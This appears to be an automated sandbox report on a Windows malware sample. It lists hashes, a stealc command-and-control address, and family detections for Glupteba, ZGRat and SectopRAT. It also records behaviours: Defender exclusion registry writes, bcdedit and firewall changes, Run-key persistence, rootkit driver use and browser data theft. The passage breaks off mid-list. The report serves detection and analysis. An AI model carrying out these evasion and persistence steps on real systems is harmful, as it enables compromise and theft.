Analysis
-
max time kernel
94s -
max time network
101s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-04-2024 09:32
Static task
static1
Behavioral task
behavioral1
Sample
a3d607292f456d782622bdf10ddcaa72.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a3d607292f456d782622bdf10ddcaa72.exe
Resource
win10v2004-20240419-en
Errors
General
-
Target
a3d607292f456d782622bdf10ddcaa72.exe
-
Size
389KB
-
MD5
a3d607292f456d782622bdf10ddcaa72
-
SHA1
e21e9ec6bc6234993591cd2034a019af59e98071
-
SHA256
8408dcfb8751f971ab0f3f4ec16abc52586a90a507ac8e6be0b02219980758f3
-
SHA512
147401e381e5ec0a539cc7272721fd0893c6a603b64217539cef925579c32b9be6cd981b68cfbf6a5f484dddc50ddc9c3195172ce00524301206cbb6786df76e
-
SSDEEP
6144:hjuZSWCTeEVTAHT6HPqHr3aUb/memWBFU/iBHZGI3XCjA77lyJkJZVKM:hjtXVTAHyc3f/U6OiJZhXCsdyJ6ZVKM
Malware Config
Extracted
stealc
http://185.172.128.62
-
url_path
/902e53a07830e030.php
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1808-583-0x0000000000300000-0x0000000003BF8000-memory.dmp family_zgrat_v1 behavioral1/memory/1808-611-0x000000001ED90000-0x000000001EEA0000-memory.dmp family_zgrat_v1 behavioral1/memory/1808-616-0x00000000057C0000-0x00000000057E4000-memory.dmp family_zgrat_v1 -
Glupteba payload 10 IoCs
Processes:
resource yara_rule behavioral1/memory/1684-247-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/448-248-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/3004-294-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/2580-314-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-563-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-617-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-672-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-728-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-739-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba behavioral1/memory/1824-750-0x0000000000400000-0x0000000001DFC000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
gYvBj1ZGfOqJfVDf4rLNtsmi.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" gYvBj1ZGfOqJfVDf4rLNtsmi.exe -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1620-668-0x0000000000400000-0x00000000004C6000-memory.dmp family_sectoprat -
Processes:
reg.exereg.exereg.exereg.exeafCO4RNNOdc8dre3EnIRbez8.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeauK8VZaRDVFWuHg35HoY616s.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zgoZGMcaU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\afCO4RNNOdc8dre3EnIRbez8.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" afCO4RNNOdc8dre3EnIRbez8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\pICeQFkDCDDquYVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\auK8VZaRDVFWuHg35HoY616s.exe = "0" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qIYKRzUEasUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qIYKRzUEasUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zgoZGMcaU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ecOJmsgAHWlsC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\epoBtGYzqLvU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\epoBtGYzqLvU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ecOJmsgAHWlsC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\pICeQFkDCDDquYVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nlcUipsDcFbdntMB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
gYvBj1ZGfOqJfVDf4rLNtsmi.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gYvBj1ZGfOqJfVDf4rLNtsmi.exe -
Modifies boot configuration data using bcdedit 14 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 2952 bcdedit.exe 1752 bcdedit.exe 2632 bcdedit.exe 2652 bcdedit.exe 2480 bcdedit.exe 2252 bcdedit.exe 2668 bcdedit.exe 1700 bcdedit.exe 1488 bcdedit.exe 964 bcdedit.exe 3036 bcdedit.exe 2320 bcdedit.exe 1992 bcdedit.exe 2028 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exerundll32.exeflow pid process 115 1528 msiexec.exe 117 1528 msiexec.exe 120 1528 msiexec.exe 123 1976 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
MsiExec.execsrss.exedescription ioc process File opened for modification C:\Windows\system32\DRIVERS\VBoxDrv.sys MsiExec.exe File created C:\Windows\system32\drivers\Winmon.sys csrss.exe File opened for modification C:\Windows\system32\DRIVERS\SET8527.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SET8527.tmp MsiExec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 2052 netsh.exe 2772 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
gYvBj1ZGfOqJfVDf4rLNtsmi.exeInstall.exerundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gYvBj1ZGfOqJfVDf4rLNtsmi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gYvBj1ZGfOqJfVDf4rLNtsmi.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WifcjtG.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation WifcjtG.exe -
Drops startup file 8 IoCs
Processes:
installutil.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cT7IV9FywM1SPlZbhgAxX6O8.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s1KNmK3AhtjZWU4Cs0RGHsV8.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7WAqKQ3nkUTm0uCX9HOV9Dx6.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3xVfORp1deqHluKZGAEc6avZ.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z4yVvPR4RlTiYmgqQ0oNzEgW.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I2iezeYHpVqY3As8LO20V2Ih.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t9wrt0F6pDMVbY1roMOcnKb4.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qVgffC7jxcX2nEwBefy20gNy.bat installutil.exe -
Executes dropped EXE 23 IoCs
Processes:
k7mJBhljBXiRSGrvpUPB8cSR.exeafCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.exeu1pw.0.exeafCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.exegYvBj1ZGfOqJfVDf4rLNtsmi.execsrss.exerun.exepatch.exeinjector.exeu1pw.3.exerPKbVNKgudVWGiyJmJUEErrb.exeInstall.exeOOoMkQq.exedsefix.exewindefender.exewindefender.exeWifcjtG.exeqwCtI4Kyl1Iuhg35GaiEEDLr.exece-installer_7.14.2_vbox-6.1.20.exej4fTPrgQC2dZNL0OS3Ox0Owy.exeInstall.exepid process 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 1684 afCO4RNNOdc8dre3EnIRbez8.exe 448 auK8VZaRDVFWuHg35HoY616s.exe 772 u1pw.0.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 240 gYvBj1ZGfOqJfVDf4rLNtsmi.exe 1824 csrss.exe 1084 run.exe 2040 patch.exe 2864 injector.exe 1516 u1pw.3.exe 1816 rPKbVNKgudVWGiyJmJUEErrb.exe 564 Install.exe 1280 OOoMkQq.exe 1316 dsefix.exe 1012 windefender.exe 1204 windefender.exe 2480 WifcjtG.exe 1700 qwCtI4Kyl1Iuhg35GaiEEDLr.exe 1640 ce-installer_7.14.2_vbox-6.1.20.exe 2140 j4fTPrgQC2dZNL0OS3Ox0Owy.exe 1456 Install.exe -
Loads dropped DLL 63 IoCs
Processes:
installutil.exek7mJBhljBXiRSGrvpUPB8cSR.exeauK8VZaRDVFWuHg35HoY616s.exerun.exepatch.execsrss.execmd.exerPKbVNKgudVWGiyJmJUEErrb.exeInstall.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeqwCtI4Kyl1Iuhg35GaiEEDLr.exerundll32.exej4fTPrgQC2dZNL0OS3Ox0Owy.exeInstall.exeMsiExec.exeMsiExec.exepid process 3060 installutil.exe 3060 installutil.exe 3060 installutil.exe 3060 installutil.exe 3060 installutil.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 3060 installutil.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 1084 run.exe 852 2040 patch.exe 2040 patch.exe 2040 patch.exe 2040 patch.exe 2040 patch.exe 1824 csrss.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe 1400 cmd.exe 3060 installutil.exe 1816 rPKbVNKgudVWGiyJmJUEErrb.exe 1816 rPKbVNKgudVWGiyJmJUEErrb.exe 1816 rPKbVNKgudVWGiyJmJUEErrb.exe 1816 rPKbVNKgudVWGiyJmJUEErrb.exe 564 Install.exe 564 Install.exe 564 Install.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 2040 patch.exe 2040 patch.exe 2040 patch.exe 1824 csrss.exe 3060 installutil.exe 1700 qwCtI4Kyl1Iuhg35GaiEEDLr.exe 844 1976 rundll32.exe 1976 rundll32.exe 1976 rundll32.exe 1976 rundll32.exe 3060 installutil.exe 2140 j4fTPrgQC2dZNL0OS3Ox0Owy.exe 2140 j4fTPrgQC2dZNL0OS3Ox0Owy.exe 2140 j4fTPrgQC2dZNL0OS3Ox0Owy.exe 2140 j4fTPrgQC2dZNL0OS3Ox0Owy.exe 1456 Install.exe 1456 Install.exe 1456 Install.exe 2512 MsiExec.exe 1280 MsiExec.exe 1280 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 6 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F}\LocalServer32\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\VBoxProxyStub.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ThreadingModel = "Both" msiexec.exe -
Processes:
resource yara_rule C:\Users\Admin\Pictures\gYvBj1ZGfOqJfVDf4rLNtsmi.exe themida behavioral1/memory/240-257-0x0000000140000000-0x0000000140726000-memory.dmp themida behavioral1/memory/240-516-0x0000000140000000-0x0000000140726000-memory.dmp themida -
Processes:
resource yara_rule behavioral1/memory/1012-733-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/1204-744-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
Processes:
afCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\afCO4RNNOdc8dre3EnIRbez8.exe = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\auK8VZaRDVFWuHg35HoY616s.exe = "0" auK8VZaRDVFWuHg35HoY616s.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" afCO4RNNOdc8dre3EnIRbez8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" afCO4RNNOdc8dre3EnIRbez8.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
afCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.execsrss.exeqwCtI4Kyl1Iuhg35GaiEEDLr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" afCO4RNNOdc8dre3EnIRbez8.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" qwCtI4Kyl1Iuhg35GaiEEDLr.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
gYvBj1ZGfOqJfVDf4rLNtsmi.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gYvBj1ZGfOqJfVDf4rLNtsmi.exe -
Drops Chrome extension 2 IoCs
Processes:
WifcjtG.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json WifcjtG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json WifcjtG.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 35 IoCs
Processes:
powershell.exeWifcjtG.exerundll32.exeMsiExec.exegYvBj1ZGfOqJfVDf4rLNtsmi.exeOOoMkQq.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.inf MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.sys MsiExec.exe File opened for modification C:\Windows\System32\GroupPolicy gYvBj1ZGfOqJfVDf4rLNtsmi.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OOoMkQq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 WifcjtG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 WifcjtG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat WifcjtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WifcjtG.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI gYvBj1ZGfOqJfVDf4rLNtsmi.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows 